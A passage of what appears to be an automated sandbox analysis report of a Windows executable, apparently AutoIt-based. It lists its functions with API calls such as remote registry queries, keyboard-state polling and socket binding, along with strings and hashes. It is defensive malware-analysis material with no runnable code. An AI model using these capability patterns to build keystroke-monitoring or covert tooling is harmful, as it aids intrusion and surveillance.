                                                                                              • Opcode Fuzzy Hash: afb4023a1d9248a5f4989e7256ab201be08bf7cea6e329a4c1b64aa13695ef79
                                                                                              • Instruction Fuzzy Hash: A631E7315013197ACF10AFA9EC49AEE77AE9F05320F188196E850E2290D731DE45CA79
                                                                                              Function 00DEC7A3 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00DED2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DEC00D,?,?), ref: 00DED314
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED350
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3C7
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3FD
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DEC89D
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00DEC908
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DEC92C
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00DEC98B
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DECA46
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00DECAB3
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00DECB48
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00DECB99
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00DECC42
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DECCE1
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DECCEE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                              • String ID:
                                                                                              • API String ID: 3102970594-0
                                                                                              • Opcode ID: e70bb266650c60645152c1af1e063dfa1219bece35acf5b1ac4d451b4a4c5bd0
                                                                                              • Instruction ID: b0e2348a3bd70002484a21cd03e4b433dfd4e1065ac055a8dd8daed1b6487cae
                                                                                              • Opcode Fuzzy Hash: e70bb266650c60645152c1af1e063dfa1219bece35acf5b1ac4d451b4a4c5bd0
                                                                                              • Instruction Fuzzy Hash: 000261716142409FD714DF25C895E2ABBE5EF48318F18849DF84ACB2A2DB31ED46CBB1
                                                                                              Function 00DCA54A Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00DCA572
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00DCA5F3
                                                                                              • GetKeyState.USER32(000000A0), ref: 00DCA60E
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00DCA628
                                                                                              • GetKeyState.USER32(000000A1), ref: 00DCA63D
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00DCA655
                                                                                              • GetKeyState.USER32(00000011), ref: 00DCA667
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00DCA67F
                                                                                              • GetKeyState.USER32(00000012), ref: 00DCA691
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00DCA6A9
                                                                                              • GetKeyState.USER32(0000005B), ref: 00DCA6BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: edbd83350086a61df02acbf07e96d0bad2a4d00d34fca7cd031df8c715352b46
                                                                                              • Instruction ID: 20416a0f6a338a3367d66ae5dd651955249826cb4ee1fd0d3633cff8537df2b9
                                                                                              • Opcode Fuzzy Hash: edbd83350086a61df02acbf07e96d0bad2a4d00d34fca7cd031df8c715352b46
                                                                                              • Instruction Fuzzy Hash: 6D419264954BCF6AFF3187688804BB5BEA16B11348F0C805DD5C68B6C2DBA49DC4CB73
                                                                                              Function 00DE4089 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoInitialize.OLE32 ref: 00DE40D1
                                                                                              • CoUninitialize.OLE32 ref: 00DE40DC
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00E00B44,?), ref: 00DE4136
                                                                                              • IIDFromString.OLE32(?,?), ref: 00DE41A9
                                                                                              • VariantInit.OLEAUT32(?), ref: 00DE4241
                                                                                              • VariantClear.OLEAUT32(?), ref: 00DE4293
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                              • API String ID: 636576611-1287834457
                                                                                              • Opcode ID: cf63115abd54d4989fa30a1613edecb679f8389d7b142f39f60c33b5f0422b5b
                                                                                              • Instruction ID: 4b3ae253decdd9f67d6ad33d6d1ddebcd24f26620581bc6d23650b9a6a5f3773
                                                                                              • Opcode Fuzzy Hash: cf63115abd54d4989fa30a1613edecb679f8389d7b142f39f60c33b5f0422b5b
                                                                                              • Instruction Fuzzy Hash: CC61AD71204341AFC710EF66D848B6ABBE8EF48754F04480DF9859B291D770ED84CBB2
                                                                                              Function 00DDA488 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DDA4D5
                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DDA5E8
                                                                                                • Part of subcall function 00DD41CE: GetInputState.USER32 ref: 00DD4225
                                                                                                • Part of subcall function 00DD41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DD42C0
                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DDA505
                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DDA5D2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1972594611-438819550
                                                                                              • Opcode ID: 7be72d8420cb012961fae110a68741e78d27cd6a42d2c20d72c84d06e0c56ed2
                                                                                              • Instruction ID: bc6a89ae899e8bee1fee75aa04126f1dc4a8639ae24b0c7fc7bcc84d8ce4448e
                                                                                              • Opcode Fuzzy Hash: 7be72d8420cb012961fae110a68741e78d27cd6a42d2c20d72c84d06e0c56ed2
                                                                                              • Instruction Fuzzy Hash: 5D413D7190020AAFCF14DFA8DD49AEEBBB5EF15310F248096E415A6291EB709E84CF71
                                                                                              Function 00D6225D Relevance: 7.8, APIs: 5, Instructions: 309COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DefDlgProcW.USER32(?,?), ref: 00D622EE
                                                                                              • GetSysColor.USER32(0000000F), ref: 00D623C3
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00D623D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Proc
                                                                                              • String ID:
                                                                                              • API String ID: 929743424-0
                                                                                              • Opcode ID: f17d29d3809db40f7695a5d5cdd08d97a8eb3e584a9a7f4312d6d099a14e27cc
                                                                                              • Instruction ID: 48262fdd835761355bc31d85002da0864d1edfff31d96f797d6f4b82ef11fc56
                                                                                              • Opcode Fuzzy Hash: f17d29d3809db40f7695a5d5cdd08d97a8eb3e584a9a7f4312d6d099a14e27cc
                                                                                              • Instruction Fuzzy Hash: 0B8107F0604958BFE6296A3D8CA9E7F295EDB47340F1D410DF282C6795CB19DE01D23A
                                                                                              Function 00DE2163 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00DE39AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DE39D7
                                                                                                • Part of subcall function 00DE39AB: _wcslen.LIBCMT ref: 00DE39F8
                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DE21BA
                                                                                              • WSAGetLastError.WSOCK32 ref: 00DE21E1
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00DE2238
                                                                                              • WSAGetLastError.WSOCK32 ref: 00DE2243
                                                                                              • closesocket.WSOCK32(00000000), ref: 00DE2272
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 1601658205-0
                                                                                              • Opcode ID: 72359830ca56eaf27bd3d62de90950c839475386628971246f3b6df59354b867
                                                                                              • Instruction ID: ae59297c1529e81945fc26252abae6fa60d862f59d30739e58e61216feeb6fd0
                                                                                              • Opcode Fuzzy Hash: 72359830ca56eaf27bd3d62de90950c839475386628971246f3b6df59354b867
                                                                                              • Instruction Fuzzy Hash: 4351AF75A00200AFE710AF64C886F2A77A9EB44718F188198F9599F3D3DA71ED41CBF1
                                                                                              Function 00DF25A0 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                              • String ID:
                                                                                              • API String ID: 292994002-0
                                                                                              • Opcode ID: 1fab7ace3f048757cc7f84644943be7620c920f90c9670bdc7bac1779b400077
                                                                                              • Instruction ID: c3aeb7566efb79ecd62ad32f21f43cb1f424b250b9d54785512a70d2e74ac58a
                                                                                              • Opcode Fuzzy Hash: 1fab7ace3f048757cc7f84644943be7620c920f90c9670bdc7bac1779b400077
                                                                                              • Instruction Fuzzy Hash: 1821AD313012489FD7109F1AD854B3A7BA6EF95324B1EC468E98ACB351DB31ED42CBB0
                                                                                              Function 00DCEBE5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00DCEC19
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: mouse_event
                                                                                              • String ID: DOWN
                                                                                              • API String ID: 2434400541-711622031
                                                                                              • Opcode ID: b9cacced09fff591dbeefb134b9072cbae409c4375082cfd32995db978fabb49
                                                                                              • Instruction ID: 516147e7fb1493895fe85b7b5cbc7a1f1aaf4f1db42263c95f259b58ffc30934
                                                                                              • Opcode Fuzzy Hash: b9cacced09fff591dbeefb134b9072cbae409c4375082cfd32995db978fabb49
                                                                                              • Instruction Fuzzy Hash: 14E0C2A629D7333CB9083128BD03EF7438CCF22734B56824AFC10E62C0ED945D8265B8
                                                                                              Function 00DF0BA0 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00DF0C44
                                                                                              • _wcslen.LIBCMT ref: 00DF0C7E
                                                                                              • _wcslen.LIBCMT ref: 00DF0CE8
                                                                                              • _wcslen.LIBCMT ref: 00DF0D50
                                                                                              • _wcslen.LIBCMT ref: 00DF0DD4
                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DF0E24
                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DF0E63
                                                                                                • Part of subcall function 00D7FD60: _wcslen.LIBCMT ref: 00D7FD6B
                                                                                                • Part of subcall function 00DC2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DC2AE8
                                                                                                • Part of subcall function 00DC2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DC2B1A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                              • API String ID: 1103490817-719923060
                                                                                              • Opcode ID: aca38ef2ebbd63e808170652164ee1f231368b5de6dbfe37f7a6a55b917d8c46
                                                                                              • Instruction ID: 45ec945b96f0ac75fba15cd87923806cff148bd7d118b96eb592f7e5a41bcb35
                                                                                              • Opcode Fuzzy Hash: aca38ef2ebbd63e808170652164ee1f231368b5de6dbfe37f7a6a55b917d8c46
                                                                                              • Instruction Fuzzy Hash: C6E1AE312042458FC724EF24C94193ABBE6FF98314B19895DF9969B3A2DB30ED45CB72
                                                                                              Function 00D624C3 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D6259A
                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00D625A2
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D625CD
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00D625D5
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00D625FA
                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D62617
                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D62627
                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D6265A
                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D6266E
                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00D6268C
                                                                                              • GetStockObject.GDI32(00000011), ref: 00D626A8
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D626B3
                                                                                                • Part of subcall function 00D619CD: GetCursorPos.USER32(?), ref: 00D619E1
                                                                                                • Part of subcall function 00D619CD: ScreenToClient.USER32(00000000,?), ref: 00D619FE
                                                                                                • Part of subcall function 00D619CD: GetAsyncKeyState.USER32(00000001), ref: 00D61A23
                                                                                                • Part of subcall function 00D619CD: GetAsyncKeyState.USER32(00000002), ref: 00D61A3D
                                                                                              • SetTimer.USER32(00000000,00000000,00000028,00D6199C), ref: 00D626DA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                              • String ID: AutoIt v3 GUI
                                                                                              • API String ID: 1458621304-248962490
                                                                                              • Opcode ID: 9c89e7b62e08365a3d6b5b555e23ed7ed5bbbb099a8ef012322937f0415e379a
                                                                                              • Instruction ID: 0ba697bde657c932dfc991494cadd9b1e90d26bf078ed9208d32c02bd1d55a22
                                                                                              • Opcode Fuzzy Hash: 9c89e7b62e08365a3d6b5b555e23ed7ed5bbbb099a8ef012322937f0415e379a
                                                                                              • Instruction Fuzzy Hash: 17B17C71A002099FDB14DFA9CC49BAE7BB6FB49314F108219FA56EB290D774E940CF61
                                                                                              Function 00DF8C9B Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00DF8CB9
                                                                                              • _wcslen.LIBCMT ref: 00DF8CCD
                                                                                              • _wcslen.LIBCMT ref: 00DF8CF0
                                                                                              • _wcslen.LIBCMT ref: 00DF8D13
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DF8D51
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DF6551), ref: 00DF8DAD
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DF8DE6
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00DF8E29
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DF8E60
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00DF8E6C
                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DF8E7C
                                                                                              • DestroyIcon.USER32(?,?,?,?,?,00DF6551), ref: 00DF8E8B
                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DF8EA8
                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DF8EB4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                              • String ID: .dll$.exe$.icl
                                                                                              • API String ID: 799131459-1154884017
                                                                                              • Opcode ID: 3bc414772bdd7856b714ef0719d6956cde6c8e28804e9194efc8036536dfa8ed
                                                                                              • Instruction ID: 9dd2f0b8c87c81add2c2af9ad7069d7f879e0408ae432b30b391f265c423ad45
                                                                                              • Opcode Fuzzy Hash: 3bc414772bdd7856b714ef0719d6956cde6c8e28804e9194efc8036536dfa8ed
                                                                                              • Instruction Fuzzy Hash: AF61BE71A00219BEEB14DF64DC45BBE77A8FF08710F148506FA15DA1D1DBB59A80DBB0
                                                                                              Function 00DD47D3 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00DD4852
                                                                                              • _wcslen.LIBCMT ref: 00DD485D
                                                                                              • _wcslen.LIBCMT ref: 00DD48B4
                                                                                              • _wcslen.LIBCMT ref: 00DD48F2
                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 00DD4930
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DD4978
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DD49B3
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DD49E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                              • API String ID: 1839972693-4113822522
                                                                                              • Opcode ID: 9eb1c93307a78ca4c22a7d5fddc272fb87010e92ec8ccd518c3d69702118d18f
                                                                                              • Instruction ID: 8666b6c72e56f47376ae4cc2576ea97e361f613f8bfc7a0cd225ebf908a87b45
                                                                                              • Opcode Fuzzy Hash: 9eb1c93307a78ca4c22a7d5fddc272fb87010e92ec8ccd518c3d69702118d18f
                                                                                              • Instruction Fuzzy Hash: BC719C326082129FC710EF24C89186AB7E5EF98768F04492EF89697361EB31DD45CBB1
                                                                                              Function 00DC62AA Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000063), ref: 00DC62BD
                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DC62CF
